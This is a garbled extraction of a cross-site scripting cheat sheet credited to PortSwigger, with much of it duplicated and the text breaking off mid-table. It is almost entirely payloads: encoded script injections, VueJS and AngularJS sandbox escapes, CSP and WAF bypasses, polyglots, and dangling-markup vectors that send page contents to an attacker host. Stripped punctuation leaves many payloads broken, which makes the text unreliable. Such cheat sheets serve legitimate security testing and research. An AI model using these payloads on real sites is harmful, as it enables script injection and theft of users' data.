Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
